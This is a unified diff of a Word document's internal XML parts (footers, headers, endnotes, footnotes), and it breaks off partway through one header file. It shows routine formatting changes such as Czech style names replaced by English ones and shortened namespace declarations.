-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w:endnote w:type="separator" w:id="-1">
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:separator/>
-      </w:r>
-    </w:p>
-  </w:endnote>
-  <w:endnote w:type="continuationSeparator" w:id="0">
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:continuationSeparator/>
-      </w:r>
-    </w:p>
-  </w:endnote>
-</w:endnotes>
-</file>
-
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:ftr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Zpat"/>
-    </w:pPr>
+      <w:pStyle w:val="Footer"/>
+      <w:spacing w:before="0" w:after="120"/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r>
+      <w:rPr/>
+    </w:r>
   </w:p>
 </w:ftr>
 </file>
 
 <file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:ftr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Zpat"/>
+      <w:pStyle w:val="Footer"/>
+      <w:spacing w:before="0" w:after="120"/>
+      <w:ind w:hanging="0"/>
+      <w:rPr/>
     </w:pPr>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="slostrnky"/>
+        <w:rStyle w:val="PageNumber"/>
       </w:rPr>
       <w:tab/>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="slostrnky"/>
+        <w:rStyle w:val="PageNumber"/>
       </w:rPr>
       <w:fldChar w:fldCharType="begin"/>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="slostrnky"/>
+        <w:rStyle w:val="PageNumber"/>
       </w:rPr>
       <w:instrText xml:space="preserve"> PAGE </w:instrText>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="slostrnky"/>
+        <w:rStyle w:val="PageNumber"/>
       </w:rPr>
       <w:fldChar w:fldCharType="separate"/>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="slostrnky"/>
+        <w:rStyle w:val="PageNumber"/>
       </w:rPr>
-      <w:t>6</w:t>
+      <w:t>7</w:t>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rStyle w:val="slostrnky"/>
+        <w:rStyle w:val="PageNumber"/>
       </w:rPr>
       <w:fldChar w:fldCharType="end"/>
     </w:r>
@@ -2041,211 +1575,236 @@
 </file>
 
 <file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:ftr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Zpat"/>
-    </w:pPr>
+      <w:pStyle w:val="Footer"/>
+      <w:spacing w:before="0" w:after="120"/>
+      <w:ind w:hanging="0"/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r>
+      <w:rPr/>
+    </w:r>
   </w:p>
 </w:ftr>
 </file>
 
-<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w:footnote w:type="separator" w:id="-1">
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:separator/>
-      </w:r>
-    </w:p>
-  </w:footnote>
-  <w:footnote w:type="continuationSeparator" w:id="0">
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:continuationSeparator/>
-      </w:r>
-    </w:p>
-  </w:footnote>
-</w:footnotes>
-</file>
-
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w:p/>
-  <w:p/>
-  <w:p/>
+<w:hdr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Normal"/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r>
+      <w:rPr/>
+    </w:r>
+  </w:p>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Normal"/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r>
+      <w:rPr/>
+    </w:r>
+  </w:p>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Normal"/>
+      <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
+      <w:bidi w:val="0"/>
+      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
+      <w:ind w:firstLine="720"/>
+      <w:jc w:val="both"/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r>
+      <w:rPr/>
+    </w:r>
+  </w:p>
 </w:hdr>
 </file>
 
 <file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:hdr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Zhlav"/>
-    </w:pPr>
+      <w:pStyle w:val="Header"/>
+      <w:spacing w:before="0" w:after="120"/>
+      <w:ind w:hanging="0"/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r>
+      <w:rPr/>
+    </w:r>
   </w:p>
 </w:hdr>
 </file>
 
 <file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" 